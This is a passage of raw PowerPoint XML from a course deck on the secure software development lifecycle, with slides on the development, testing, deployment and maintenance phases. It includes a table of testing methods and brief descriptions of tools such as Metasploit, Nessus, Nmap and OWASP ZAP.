              <a:t>Implement sound code based on standards you drafted during requirements and design and following fundamental principles of software security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use code reviews to check for various defects related to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>design and execution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Have a peer review your code for security mistakes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use software tools to analyze for security mistakes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check your code against known security issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use them throughout the development process as a</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>first line of defense against common problems.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{005BEE8F-CE2E-47C5-A023-FC3E731CE127}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Development Phase</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1838601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1C516-95C7-40CE-B214-3E52B5E487B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C48095D2-81DE-48A9-A24E-5562DB3BEFA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="990600"/>
            <a:ext cx="8460150" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test early and often.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security testing should include all three elements of the CIA Triad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The breaker mentality should dominate this phase; push the software to its limits. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different methods you can use to accomplish the goals set forth in the CIA triad.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B7B9E88-5BE8-46F4-8D3B-E80AEF2CFF9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Testing Phase</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Group 23"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="762000" y="2362200"/>
          <a:ext cx="7696200" cy="4130040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1656265">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6039935">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3048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Testing Method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10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="26842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Security Functionality</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>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Verify that the software behaves according to requirements, which should include security.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68424">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Fuzz-testing</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>(fuzzing)</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>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Enter a wide variety of out-of-range, invalid, random, or garbage data in an attempt to break poorly implemented input methods.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99284244"/>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Session Management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Ensure that tokens and other session management devices can't be intercepted or abused.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48991080"/>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Client-Side Testing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Confirm that there are no vulnerabilities in the user interface, and no information is revealed in user interface code or messaging.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237113336"/>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Dynamic Validation</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>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Use variable data in the code to ensure the integrity of the software.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32621677"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="268424">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Risk-Based Testing</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>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Prioritize what features to test based on their potential risk and the impact of their failure.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803677343"/>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Penetration Testing</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>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Play the role of an attacker, finding weaknesses and attempting exploits.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168714862"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="268424">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Authentication Testing</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>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Verify that communication over a network such as the Internet is protected by secure identification methods.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809871497"/>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Regression Testing</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>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300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Confirm that newer patches, updates, and fixes work with older code.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24668465"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="600827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51C516-95C7-40CE-B214-3E52B5E487B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C48095D2-81DE-48A9-A24E-5562DB3BEFA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380025" y="1206155"/>
            <a:ext cx="8460150" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Include vulnerability and exploitability tests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Testing should be performed by a separate penetration testing team.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B7B9E88-5BE8-46F4-8D3B-E80AEF2CFF9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Testing Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Group 23"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="762000" y="2362200"/>
          <a:ext cx="7696200" cy="2773680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1656265">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6039935">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3048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Tool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10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="26842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Metasploit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A popular penetration testing and exploit framework with many plugin modules that are regularly updated. Has free community and paid commercial versions that run on Windows. The free open source version runs on Linux.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68424">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Nessus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A popular vulnerability scanner from tenable.com that runs on multiple platforms. Various free and commercial licensing options are available.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99284244"/>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Kismet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An open source wireless intrusion detection framework, with built in device detection, sniffing, and war-driving capabilities.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48991080"/>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OWASP ZAP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A popular open source web application security scanner.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237113336"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1578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Calibri"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Nmap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Calibri"/>
                        </a:rPr>
                        <a:t>An open source network scanner with many features including host, service, and operating system discovery, vulnerability testing, and packet crafting.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32621677"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4246752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go butt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704" y="5326170"/>
            <a:ext cx="1173710" cy="1119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hand point png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="17439"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="5195717" y="1873396"/>
            <a:ext cx="4876800" cy="30197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4618383-03A5-4F11-867C-DF2C1193F29B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D424F1F8-3198-4225-974C-585E61FE80DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="6478659" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When testing is complete and all issues have been worked out:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prepare to release the software to users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anticipate what could go wrong before your software is released.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Establish a process by which users can report bugs or security issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don't just let users discover flaws on their own without any way to inform you.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure you're there to receive defect reports immediately so that you can fix the problems as quickly as possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Update your documentation to record what went wrong and why, so you'll be better prepared in the future.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deployment should be done with the same attention to detail shown during all of the phases that came before.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AA39967-CA7E-43C7-9B8D-F6F7AA2B20CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deployment Phase</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2623614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825129" y="5203521"/>
            <a:ext cx="1184233" cy="1552795"/>
            <a:chOff x="6579191" y="1752600"/>
            <a:chExt cx="1314450" cy="1723539"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579191" y="1752600"/>
              <a:ext cx="1314450" cy="1723539"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6832942" y="2259040"/>
              <a:ext cx="1037455" cy="649076"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
              <a:scene3d>
                <a:camera prst="orthographicFront">
                  <a:rot lat="0" lon="21299965" rev="300000"/>
                </a:camera>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Your</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Software</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F1CC49F-E423-43A1-A8B0-C72F4213F4BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6804374A-D31E-4D89-BA3D-625FC3B2877D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Issue patches and hotfixes to address problems both small and large.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You’ll need to plan how and when to do this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May not be enough to wait for external feedback before making changes to your software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test security:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When you add new features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When you remove old features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When your code is altered in any way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When third-party code (dependencies) is altered in any way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don't overwhelm users with updates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Combine updates that aren't urgent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure no security issues in any software dependencies</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>leave your software vulnerable.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F812746C-ED8E-40C5-BF76-00488FB5B09F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Maintenance Phase</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="Image result for maintenanc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424387"/>
            <a:ext cx="2651342" cy="238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877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5E806E-9E5D-4DF1-8259-22A8FF35A12B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
